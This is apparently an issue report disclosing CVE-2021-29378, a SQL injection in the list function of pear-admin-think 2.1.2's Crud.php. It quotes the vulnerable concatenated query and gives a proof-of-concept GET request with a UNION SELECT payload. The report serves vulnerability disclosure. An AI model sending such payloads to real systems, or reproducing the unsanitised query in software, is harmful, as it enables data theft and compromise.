Headline
CVE-2021-29378: pear-admin-think V2.1.2 has a sql injection vulnerability · Issue #I3DIEC · Pear Admin/Pear Admin Think - Gitee.com
SQL Injection in pear-admin-think version 2.1.2, allows attackers to execute arbitrary code and escalate privileges via crafted GET request to Crud.php.
pear-admin-think V2.1.2 has a sql injection vulnerability
sql injection vulnerability exists in pear-admin-think V2.1.2
This vulnerability allows remote attackers to obtain user sensitive data and even command execution
url:/admin.php/admin.crud/list/name/admin_admin?page=1&limit=10
Vulnerability file:app/admin/controller/admin/Crud.php
public function list($name)
{
$sql = Db::query('SELECT COLUMN_NAME,IS_NULLABLE,DATA_TYPE,IF(COLUMN_COMMENT = "",COLUMN_NAME,COLUMN_COMMENT) COLUMN_COMMENT FROM information_schema.COLUMNS WHERE TABLE_NAME = "' . $name . '"order by ORDINAL_POSITION asc');
$this->jsonApi('', 0, $sql);
}
Vulnerability exploitation:
1.Log in backstage
2.Curd:
poc:
GET /admin.php/admin.crud/list/name/123"union%20select%201,database(),3,4%23?page=1&limit=10 HTTP/1.1
Host: www.padmin.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://www.padmin.com/admin.php/admin.crud/index
Cookie: thinkphp_show_page_trace=0|0; _ga=GA1.2.82281587.1616725844; _gid=GA1.2.1061036003.1616725844; PHPSESSID=24b6f9927555352d4dbfbdf7c145d92a; thinkphp_show_page_trace=0|0; hash=606a3660a4af22638d896476e523344aa470e9b38ea908989711bb9abe5d92b57d31c36a923ed9bd379b16a871efca19b4d6847d9fc88b180e9f620c36a26b8a1f40fc99a846d2ac8eb60b4b4c8cc845
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1